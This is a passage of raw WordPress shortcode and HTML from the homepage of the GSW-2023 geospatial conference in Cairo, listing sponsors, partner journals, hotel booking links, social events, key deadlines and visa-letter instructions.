size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" 